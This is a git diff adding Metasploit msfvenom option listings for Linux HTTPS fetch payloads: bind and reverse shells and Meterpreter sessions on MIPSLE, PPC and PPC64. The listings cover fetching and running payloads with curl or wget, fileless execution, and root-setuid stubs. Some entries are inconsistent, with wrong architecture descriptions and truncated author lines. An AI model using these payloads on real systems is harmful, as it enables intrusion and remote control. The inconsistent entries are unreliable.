@@ -0,0 +1,79 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/https/mipsle/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + scut + vaicebine + Vlatko Kosturjak + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME aplZKBCxH no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTPS server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-linux-https-mipsle-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-mipsle-shell_reverse_tcp.txt new file mode 100644 index 0000000..fb8379d --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsle-shell_reverse_tcp.txt 
@@ -0,0 +1,84 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/https/mipsle/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + rigan + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME EzswaLOmXPJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTPS server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-ppc-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-https-ppc-meterpreter_reverse_http.txt new file mode 100644 index 0000000..6b4522b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-ppc-meterpreter_reverse_http.txt 
@@ -0,0 +1,109 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/ppc/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/ppc/meterpreter_reverse_http: +========================= + +nt_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME AQlXodhLzr no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to 
use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-ppc-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-https-ppc-meterpreter_reverse_https.txt new file mode 100644 index 0000000..67a2800 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-ppc-meterpreter_reverse_https.txt 
@@ -0,0 +1,111 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/ppc/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/ppc/meterpreter_reverse_https: +========================= + +_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME AgJNQPAl no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A 
string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-ppc-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-ppc-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..fd40553 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-ppc-meterpreter_reverse_tcp.txt 
@@ -0,0 +1,103 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/ppc/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/ppc/meterpreter_reverse_tcp: +========================= + +rent_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME KETeARbr no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + 
MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-ppc64-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-ppc64-shell_bind_tcp.txt new file mode 100644 index 0000000..16c9803 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-ppc64-shell_bind_tcp.txt 
@@ -0,0 +1,83 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/https/ppc64/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME pNVqAnhCzXPG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC64 payload from an HTTPS server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + 
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-ppc64-shell_find_port.txt b/msfvenom/payload_options/cmd-linux-https-ppc64-shell_find_port.txt new file mode 100644 index 0000000..42099b7 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-ppc64-shell_find_port.txt 
@@ -0,0 +1,82 @@ + + Name: HTTPS Fetch, Linux Command Shell, Find Port Inline + Module: payload/cmd/linux/https/ppc64/shell_find_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CPORT 34194 no The local client port +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME dhvwldDCj no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC64 payload from an HTTPS server. + Spawn a shell on an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
